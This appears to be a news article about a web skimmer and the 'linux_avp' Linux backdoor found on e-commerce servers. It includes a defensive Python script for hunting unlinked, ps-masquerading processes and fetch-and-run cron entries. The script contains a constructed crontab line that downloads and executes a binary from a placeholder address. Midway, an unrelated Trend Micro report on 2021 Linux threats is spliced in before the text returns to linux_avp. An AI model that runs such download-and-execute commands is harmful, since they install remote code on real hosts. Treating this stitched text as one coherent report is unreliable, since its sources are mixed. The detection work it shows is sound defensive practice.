Hackers deploy Linux malware, web skimmer on e-commerce servers

Security researchers have discovered that attackers are injecting credit card skimmers into online store websites and, after injecting the skimmer, are also deploying a Linux backdoor on the compromised e-commerce server. The injected script places fake payment forms on the checkout pages displayed to customers, so that card details entered there are captured by the attackers. The threat was revealed by the research team at Sansec, who found that the attacker began with automated e-commerce attack probes that tested dozens of vulnerabilities across common online store platforms.

Linux malware not detected by security software

On the same server, the Dutch cyber security company Sansec spotted malware: a Golang-based executable named linux_avp was downloaded to the compromised server and executed. Once started, it immediately removes itself from disk and disguises itself as a "ps -ef" process, the command normally used to list running processes. Analyzing the linux_avp backdoor, Sansec found that it then waits for commands from a server in Beijing hosted on Alibaba's network.

They also found that the malware gains persistence by adding a new crontab entry that re-downloads the malicious payload from its command and control server and reinstalls the backdoor if it is detected and removed, or if the server reboots. So far, this backdoor has not been detected by any anti-malware engine on VirusTotal, even though a sample was first uploaded over a month ago, on October 8.
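The two behaviours just described, a process that unlinks its own binary and masquerades as "ps -ef", and a crontab entry that re-fetches the payload, are both visible from the host. The following hunting script is an added example and not Sansec's tooling or the linux_avp sample itself: it walks a /proc tree looking for processes whose executable has been deleted or whose argv[0] claims to be ps while the executable is not the real ps, and it scans crontab text for download-and-execute entries. Sansec did not publish the exact crontab line, so the FETCH_AND_RUN pattern and the list of genuine ps paths are assumptions, and all sample processes and crontab lines below are constructed.

```python
"""Hunt for an unlinked, ps-masquerading process and a re-download cron entry.

Added example, not Sansec's code or the linux_avp sample. All sample data is constructed.
"""
import glob
import os
import re
import tempfile
from dataclasses import dataclass
from typing import List, Optional, Sequence, Tuple

# Assumption: where a genuine ps binary lives on common distributions.
GENUINE_PS = {"/bin/ps", "/usr/bin/ps"}
# Suffix the kernel appends to readlink(/proc/PID/exe) once the binary is unlinked.
DELETED = " (deleted)"
# Assumption: the real re-download line is not published; this covers the usual
# curl/wget shapes (pipe into a shell, or download then chmod/run it).
FETCH_AND_RUN = re.compile(
    r"\b(?:curl|wget)\b.*(?:\|\s*(?:ba)?sh\b|(?:&&|;)\s*(?:chmod|\./|/tmp/|(?:ba)?sh\b))"
)


@dataclass
class Finding:
    kind: str
    pid: Optional[int]
    detail: str


def read_argv(pid_dir: str) -> List[str]:
    """/proc/PID/cmdline is NUL-separated; empty means unreadable or a kernel thread."""
    try:
        with open(os.path.join(pid_dir, "cmdline"), "rb") as fh:
            raw = fh.read()
    except OSError:
        return []
    return [a.decode("utf-8", "replace") for a in raw.split(b"\0") if a]


def scan_processes(proc_root: str = "/proc") -> List[Finding]:
    """Flag processes with a deleted executable or a spoofed `ps` argv[0].

    Reading /proc/PID/exe of another user's process needs ptrace access, so run as root.
    """
    findings: List[Finding] = []
    for entry in sorted(os.listdir(proc_root)):
        if not entry.isdigit():
            continue
        pid, pid_dir = int(entry), os.path.join(proc_root, entry)
        try:
            exe = os.readlink(os.path.join(pid_dir, "exe"))
        except OSError:
            continue  # kernel thread, process already exited, or no permission
        argv = read_argv(pid_dir)
        deleted = exe.endswith(DELETED)
        exe_path = exe[: -len(DELETED)] if deleted else exe
        if deleted:
            findings.append(Finding("deleted-exe", pid, f"exe={exe!r} argv={argv}"))
        if argv and os.path.basename(argv[0]) == "ps" and exe_path not in GENUINE_PS:
            findings.append(Finding("spoofed-ps", pid, f"argv={argv} exe={exe!r}"))
    return findings


def scan_crontab(text: str) -> List[Finding]:
    """Flag crontab lines that download something and execute it."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        line = line.strip()
        if line and not line.startswith("#") and FETCH_AND_RUN.search(line):
            findings.append(Finding("cron-fetch-exec", None, f"line {lineno}: {line}"))
    return findings


def read_host_crontabs() -> str:
    """Concatenate system and per-user crontabs (Debian and RHEL family paths)."""
    paths = ["/etc/crontab"] + glob.glob("/etc/cron.d/*") \
        + glob.glob("/var/spool/cron/crontabs/*") + glob.glob("/var/spool/cron/*")
    chunks = []
    for path in paths:
        try:
            with open(path, encoding="utf-8", errors="replace") as fh:
                chunks.append(fh.read())
        except OSError:
            pass  # missing file, directory entry, or no permission
    return "\n".join(chunks)


def build_fake_proc(processes: Sequence[Tuple[int, Sequence[str], str]]) -> str:
    """Build a fake /proc tree in a temp dir so the scanner can run offline (constructed data)."""
    root = tempfile.mkdtemp(prefix="fakeproc-")
    for pid, argv, exe_target in processes:
        pid_dir = os.path.join(root, str(pid))
        os.mkdir(pid_dir)
        with open(os.path.join(pid_dir, "cmdline"), "wb") as fh:
            fh.write(b"\0".join(a.encode() for a in argv) + b"\0")
        os.symlink(exe_target, os.path.join(pid_dir, "exe"))  # dangling, like a deleted exe
    return root


# Constructed samples: init, a genuine ps, and a backdoor posing as ps after unlinking itself.
SAMPLE_PROCESSES = [
    (1, ["/sbin/init"], "/usr/lib/systemd/systemd"),
    (777, ["ps", "-ef"], "/usr/bin/ps"),
    (4242, ["ps", "-ef"], "/tmp/linux_avp" + DELETED),
]
SAMPLE_CRONTAB = """\
# constructed crontab, not the real linux_avp entry; 203.0.113.10 is a documentation address
0 3 * * * /usr/bin/certbot renew --quiet
*/5 * * * * curl -s http://203.0.113.10/linux_avp -o /tmp/.x && chmod +x /tmp/.x && /tmp/.x
"""

if __name__ == "__main__":
    for f in scan_processes(build_fake_proc(SAMPLE_PROCESSES)) + scan_crontab(SAMPLE_CRONTAB):
        print("sample:", f)
    for f in scan_processes("/proc") + scan_crontab(read_host_crontabs()):
        print("host:", f)
```

Treat each finding as a lead rather than a verdict: deleted-exe also fires for a daemon whose package was upgraded while it kept running, so check whether the path still exists with a different inode and compare the process start time with the package's install time before escalating. A process that both reports itself as ps and has no binary on disk, as in the constructed pid 4242, matches the linux_avp behaviour described above and is worth pulling from memory (for example with /proc/PID/exe while the process is still alive) before it is killed.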

The person who uploaded that sample could be the creator of linux_avp, since it was submitted a day after researchers at Sansec spotted it while investigating the e-commerce site breach.

The state of Linux security in the first half of 2021

Linux is powerful, universal, and reliable, but it is not without its flaws; like other operating systems, it is susceptible to attack. This article discusses the state of Linux security in the first half of 2021 and provides an in-depth look at the Linux threat landscape. It covers several pressing security issues that affect Linux, including the types of malware that exist in the Linux world, vulnerabilities that affect the Linux operating system and the various software stacks that run on it, and web application security risks and how attackers abuse them to compromise Linux systems running in the cloud.

The data presented in this article comes from the data lake behind the Trend Micro Smart Protection Network (SPN), which aggregates detections from Trend Micro products, supplemented by data collected from honeypots, sensors, anonymized telemetry and other backend services. It reflects the real-world prevalence of malware, exploitation and insecure configurations in enterprises across verticals, from small organizations to large industries.

Many consider Linux a unique operating system because of its stability, flexibility, and open-source nature. Its stellar reputation is supported by many notable accomplishments over the past few years. For example, 100% of the world's top 500 supercomputers run Linux, and 50.5% of the world's top 1,000 websites use it, according to a survey by W3Techs. Our previous article explained how Linux dominates the cloud, running on 90% of public cloud workloads in 2017. Linux is also uniquely supported for cloud workloads on the best price-to-performance Advanced RISC Machines (ARM) processors in the world, such as AWS Graviton. Besides running on 96.3% of the world's top 1 million web servers, Linux also powers smartwatches, bullet trains, and even the world's major space programs.

Among Linux and Unix-based deployments, Red Hat accounts for the largest share of enterprise users, followed by Amazon Linux and Ubuntu. Organizations rely on well-maintained Linux distributions for their workloads, and this distribution reflects the support the vendors provide: Red Hat Enterprise Linux (RHEL) and Amazon Linux AMIs, for example, are the first to ship fixes for their supported versions. This distribution will not surprise most readers. It should be noted, however, that about 2.6% of deployments are IBM AIX and Oracle Solaris, platforms known for their stability and robustness on which businesses run critical workloads.

At the time of writing, all of the linux_avp backdoor's command and control (C&C) servers were down, which is typical of attacks aimed at a small number of targets, where the operators shut down their infrastructure once their goals have been met.